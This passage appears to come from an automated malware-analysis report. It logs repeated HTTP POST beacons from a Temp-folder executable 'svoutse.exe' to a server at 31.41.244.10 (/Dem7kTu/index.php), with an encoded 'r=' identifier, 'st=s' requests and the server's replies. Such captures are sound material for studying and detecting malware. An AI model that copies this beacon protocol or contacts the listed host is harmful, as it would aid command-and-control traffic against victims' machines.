Sep 6, 2024 09:59:30.331011057 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:31.051662922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.7	49917	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:31.176897049 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:31.879453897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	49918	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:31.890216112 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:32.626110077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	49919	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:32.755032063 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:33.473628044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	49920	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:33.483797073 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:34.208023071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	49921	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:34.323436975 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:35.026388884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	49922	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:35.035401106 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:35.734221935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.7	49923	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:35.853379011 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:37.113984108 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:37.114006042 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:37.114073038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.7	49925	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:37.126605034 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:37.833369970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.7	51312	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:37.962702990 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:38.656450987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.7	51314	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:38.667027950 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:39.369755030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	51315	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:39.492846012 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:40.185518980 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.7	51316	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:40.194885015 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:40.920136929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.7	51317	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:41.046272993 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:41.746063948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.7	51318	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:41.754555941 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:42.477236986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.7	51319	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:42.603358030 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:43.306701899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.7	51320	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:43.315757036 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:44.023732901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.7	51321	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:44.147475004 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:44.869127989 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.7	51322	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:44.877931118 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:45.573246956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.7	51323	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:45.687777042 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:46.385834932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.7	51324	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:46.398001909 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:47.097655058 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.7	51325	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:47.210247040 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:47.918157101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.7	51326	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
